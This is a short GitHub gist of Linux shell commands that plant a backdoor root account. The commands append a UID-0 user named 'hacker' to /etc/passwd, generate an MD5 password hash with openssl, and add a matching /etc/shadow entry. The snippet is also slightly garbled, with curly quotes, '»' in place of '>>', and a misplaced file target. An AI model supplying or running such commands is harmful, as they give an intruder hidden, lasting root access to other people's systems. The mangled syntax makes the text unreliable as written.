Skip to content

Instantly share code, notes, and snippets.

@leveled
Created October 19, 2016 00:49
Show Gist options
  • Save leveled/efe9e083b2ae5fcbcd81c688dabf9d40 to your computer and use it in GitHub Desktop.
Save leveled/efe9e083b2ae5fcbcd81c688dabf9d40 to your computer and use it in GitHub Desktop.
echo “hacker:x:0:0:A friend:/:/bin/bash” » /etc/passwd
/etc/shadow root@localhost:~# openssl passwd -1 -salt xyz freeworld $1$xyz$A1YZaeEjVGoBzmQpTTBFv1
echo “hacker:$1$xyz$A1YZaeEjVGoBzmQpTTBFv1:13529:0:99999:7:::” »
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment